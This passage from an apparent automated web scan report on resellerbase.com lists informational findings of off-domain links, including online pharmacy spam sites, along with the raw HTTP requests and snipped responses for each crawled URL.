Request

GET /user_search.php?pflag=search&ltr=D HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.drugsforyourhealth.com/">http://www.drugsforyourhealth.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.335. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.easy-rx-meds.net/
http://www.euro-drugs.biz/
http://www.rx-buy.info/

Request

GET /user_search.php?pflag=search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
</a><a href=http://www.euro-drugs.biz> Prescriptions online</a>
...[SNIP]...
<td><a href="http://www.easy-rx-meds.net">http://www.easy-rx-meds.net</a>
...[SNIP]...
<td><a href="http://www.rx-buy.info/">http://www.rx-buy.info/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.336. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search&ltr=M

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.pharmaceutical-sale.com/

Request

GET /user_search.php?pflag=search&ltr=M HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.pharmaceutical-sale.com/">http://www.pharmaceutical-sale.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.337. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pg_which=4&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.fioricet-rx.com/
http://www.genericmedsale.com/

Request

GET /user_search.php?pg_which=4&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 27983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.genericmedsale.com">http://www.genericmedsale.com</a>
...[SNIP]...
<td><a href="http://www.fioricet-rx.com/">http://www.fioricet-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.338. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pg_which=6&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.pharmaceutical-sale.com/
http://www.tramadol-rx.com/

Request

GET /user_search.php?pg_which=6&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 27920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.pharmaceutical-sale.com/">http://www.pharmaceutical-sale.com/</a>
...[SNIP]...
<td><a href="http://www.tramadol-rx.com/">http://www.tramadol-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.339. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search&ltr=B

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.rx-buy.info/
http://www.trustedstore.info/

Request

GET /user_search.php?pflag=search&ltr=B HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.rx-buy.info/">http://www.rx-buy.info/</a>
...[SNIP]...
<td><a href="http://www.trustedstore.info/">http://www.trustedstore.info/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.340. http://www.resellerbase.com/web-service/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.341. http://www.resellerbase.com/web-service/domain-names/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.342. http://www.resellerbase.com/web-service/domain-names/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/googlepr.php?link_id=4

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/domain-names/googlepr.php?link_id=4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.343. http://www.resellerbase.com/web-service/domain-names/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://reseller.targetdomain.com/
http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase
http://validator.w3.org/check?uri=referer
http://www.dograecorp.com/
http://www.myresellerpanel.com/
http://www.nicline.com/
http://www.resellerclub.com/

Request

GET /web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:46:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nicline.com" name="link_28"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nicline.com" name="link_28"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://reseller.targetdomain.com" name="link_4"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://reseller.targetdomain.com" name="link_4"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.resellerclub.com" name="link_17"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.resellerclub.com" name="link_17"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.344. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.345. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.346. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.347. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.348. http://www.resellerbase.com/web-service/domain-names/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.349. http://www.resellerbase.com/web-service/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/googlepr.php?link_id=7

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/googlepr.php?link_id=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:11 GMT
Server: Apache/2
